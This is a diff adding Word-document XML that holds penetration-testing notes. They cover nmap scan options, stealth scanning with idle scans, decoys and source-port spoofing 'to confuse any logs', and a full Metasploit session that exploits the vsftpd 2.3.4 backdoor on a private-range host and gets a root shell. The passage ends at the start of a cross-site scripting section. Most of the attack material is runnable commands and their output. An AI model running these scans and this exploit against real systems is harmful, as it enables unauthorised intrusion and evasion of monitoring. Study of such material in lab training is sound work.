+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --reason 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-p0-65535 </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Scan all TCP ports.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: A fast SYN scan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Probe open ports to determine service/version info.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-O</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Enable OS detection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Run default safe scripts.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>--reason</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Shows why Nmap concluded a port is open/closed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[+] Covert Scanning: Prioritizes stealth and evasion. This approach is slow, methodical, and designed to bypass or confuse security controls. It is used in red team exercises or when you need to remain undetected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>a) Ultimate Stealth: Use the Idle Scan (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) to ensure zero packets are sent from your IP to the target.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>b) Obfuscation: Use decoys (-D) and source port manipulation (-g) to confuse any logs that are generated.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>c) Verification: Use different scan types (NULL, XMAS) to cross-validate findings from different angles.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sSVC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p- --source-port 53 --min-parallelism 10 --min-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hostgroup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 10 --max-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hostgroup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 20 --max-retries 2 --max-scan-delay 5 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>target_range</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">--min-parallelism </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">10  </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>: 10 Parallel tasks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--max-retries 2</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Number of Retry Probing Ports</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--max-scan-delay 5</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Delay between each scan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--min-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostgroup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 10 --max-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostgroup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 20</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Scan min 10 and max 20 hosts at one time</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_______________________________</w:t>
+      </w:r>
+      <w:r>
+        <w:t>________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>All:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -g 53 -D RND:5 -p 21,22,80,111 --reason 192.168.56.101</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>___________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metasploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Exploit+Payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Port 21 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">search </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Matching Modules</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>================</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   Name                                  Disclosure Date  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Rank       Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   ----</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-----------</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                         </w:t>
+      </w:r>
+      <w:r>
+        <w:t>------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>---------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">--             </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  ----</w:t>
+      </w:r>
+      <w:r>
+        <w:t>----</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-----------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ftp/vsftpd_234_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>backdoor  2011</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-07-03       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>excellent  VSFTPD</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> v2.3.4 Backdoor Command Execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; use exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/ftp/vsftpd_234_backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show options</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Module options (exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ftp/vsftpd_234_backdoor):</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   Name   Current </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Setting  Required</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   RHOST                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>yes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">       The target address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   RPORT  21               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>yes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">       The target port</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Exploit target:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Id  Name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   --  ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   0   Automatic</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set RHOST 192.168.127.154</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>RHOST =&gt; 192.168.127.154</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show payloads</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Compatible Payloads</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>===================</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   Name               Disclosure Date </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Rank    Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   ----</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-----</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">             </w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>---------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">------             </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    ----------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>----</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">/interact        normal  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Unix Command, Interact with Established Connection</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/interact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">payload =&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/interact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show options</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Module options (exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ftp/vsftpd_234_backdoor):</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   Name   Current </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Setting  Required</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>RHOST  192.168.127.154</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>yes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">       The target address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   RPORT  21               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>yes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">       The target por</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Exploit target:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Id  Name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   --  ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   0   Automatic</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[*] Banner: 220 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vsFTPd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.3.4)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[*] USER: 331 Please specify the password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[+] Backdoor service has been spawned, handling...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">[+] UID: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=0(root) gid=0(root)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[*] Found shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[*] Command shell session 1 opened (192.168.127.159:57936 -&gt; 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hoa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt;root</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Cross-site Scripting Attacks:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs, HTML code, etc) into victim's web browser.</w:t>
+      </w:r>
+    </w:p>
